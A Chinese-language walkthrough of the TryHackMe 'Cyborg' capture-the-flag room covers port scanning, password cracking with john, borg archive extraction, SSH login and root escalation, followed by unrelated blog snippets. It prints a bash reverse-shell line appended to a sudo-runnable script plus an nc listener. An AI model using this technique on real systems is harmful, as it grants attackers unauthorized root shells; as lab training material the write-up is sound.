[Day12] THM Cyborg

资料蒐集

  • 老梗 nmap -A 10.10.210.5
  • 回答问题
    • Scan the machine, how many ports are open
      • 2
    • What service is running on port 22?
      • SSH
    • What service is running on port 80?
      • HTTP
  • 扫路径
    • python3 dirsearch.py -u http://10.10.210.57/ -e all
      • /admin/
      • /etc/

Web

  • 先从 /etc/ 路径开始看里面有啥
  • 找到路径底下有一个 passwd 档案
  • 透过 john 进行爆破
    • john a.txt --wordlist=/opt/rockyou
    • 取得帐密
      • 帐号 : music_archive
      • 密码 : squidward
  • 继续逛 /admin/
    • 发现有 Archive 可以下载
  • 解开之後发现是一种奇怪格式

Brog

  • 尝试简单的看完说明後
    • borg list .
      • 输入密码,刚刚约翰破出来的 squidward
      • 可以看到一些资讯
    • borg mount . ../a
      • 把档案挂载起来
  • 发现挂载的档案里面有 note
    • alex:S3cretP@s3
    • 看起来就很像帐密

SSH

  • 用 ssh 搭配帐密登入
    • 取得 user flag

提权

  • 先用 sudo -l 看我们有什麽权限
    • 发现我们可以用 sudo 执行 /etc/mp3backups/backup.sh
  • 观察权限
    • 发现我们是这个档案的拥有者,但我们不能修改他
    • 不过可以透过 chmod +w 新增 Write 权限
  • 插入 Reverse shell
    • echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
    • 直接用 reverse shell 插入档案最下方
  • 执行 shell
    • 攻击机开启监听
      • nc -vlk 7877
    • 被骇机用 sudo 执行该档案
      • sudo /etc/mp3backups/backup.sh
  • 拿到 root shell!

<<:  Day 27 - ios 开发实作(今天还要继续吃吗APP-1、Swift UI Passing data 不同页面传值)

>>:  [Day12] Firestore

安全意识,培训和教育(security awareness, training and education)

所有雇员(All employees) 总体上,“所有员工”是接受或参加意识介绍或活动的理想目标,...

数据流图初学者指南

数据流图为组织理解、完善和实施新流程或系统提供了一种直接、有效的方式。它们是您的流程或系统的可视化表...

#12. Drawing App(原生JS版)

#12. Drawing App 这次要挑战的是比小画家还阳春的绘图app,会利用到canvas a...

DAY3-EXCEL统计分析:认识离散型机率

离散型机率 离散行机率包括很多种,例如:白努利型分布(Bernoulli distribution)...

[DAY08] 部署用 Designer 做好的 Pipiline 到 Web API

DAY08 部署用 Designer 做好的 Pipeline 到 Web API 昨天我们用 De...